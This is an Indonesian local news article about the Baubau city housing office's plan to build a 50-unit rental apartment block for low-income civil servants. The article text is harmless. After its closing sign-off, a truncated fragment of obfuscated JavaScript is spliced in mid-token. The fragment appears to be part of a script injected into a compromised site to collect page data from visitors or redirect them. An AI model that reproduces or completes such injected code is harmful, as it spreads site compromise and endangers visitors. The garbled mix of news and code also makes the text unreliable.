2018, Pemkot Bangun Rusun untuk PNS

84 kali dilihat, 1 kali dilihat hari ini

BAUBAU- Dinas Perumahan dan Kawasan Pemukiman Kota Baubau bakal membangun rumah susun (Rusun) bagi PNS Baubau bergolongan rendah. Golongan rendah yang dimaksud mulai dari golongan satu, dua dan golongan IIIa yang memiliki penghasilan dibawah Rp 4 Juta setiap bulan.

Sekretaris Dinas (Sekdin) Perumahan dan Kawasan Pemukiman Kota Baubau, Yuli Widyawarti, mengatakan, Rusun yang berlokasi di Kelurahan Lipu Palagimata tersebut bertipe 36 dengan desain empat lantai dan memiliki 50 bilik hunian. Kata dia, meski tidak menyebutkan rencana peletakan batu pertama bangunan yang bersumber dari DAK tersebut, dipastikan bakal dibangun 2018.

“Belumlah, kita tunggu lelang dulu, kita tidak tahu juga ini di pusat seperti apa, yang jelas kita adalah salah satu lokasi penerima bantuan Rusun dan semua sudah lengkap persyaratnnya tinggal proses lelang karena kalau tidak lengkap kita tidak akan diproses. Rencananya khan akhir tahun kemarin mau proses lelang, namun tidak tahu pertimbangannya apa, nanti awal tahun.

Kata dia, alasan pihaknya mengusulkan Rusun di pemerintah pusat, selain melihat kebutuhan rumah PNS baubau yang banyak juga adanya lokasi untuk mewujudkan program tersebut. “Sebenarnya kita ada niat untuk membangun perumahan PNS karena banyak sekali PNS yang respon terhadap perumahan dan kementrian menyahuti dan kinisudah banyak yang mendaftar,” ujarnya.

Untuk itu, pihaknya berharap dengan program yang didanai melalui APBN itu bisa membantu PNS berpenghasilan rendah, sebab, pemerintah saat ini lagi menggenjot terpenuhinya kesejahteraan masyarakat, baik kebutuhan tentang papan maupun sandang dan pangan, sehingga PNS yang belum memiliki rumah namun sudah berkeluarga bisa terbantu dengan hadirnya Rusun tersebut.

“Intinya sekarang bagaimana menggenjot itu bisa dan maasyarkat terpenuhi ksejahteraannya. Bukankah kesejahteraan itu yang mendasar itu sandang, pangan dan papan terutama perumahan, jadi sekarang kita sudah ada dinas baru bagaimana kita memprioritaskan terpenuhi semua kebutuhannya,” pungkasnya.(is) eURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

You might also like More from author

Leave A Reply

Your email address will not be published.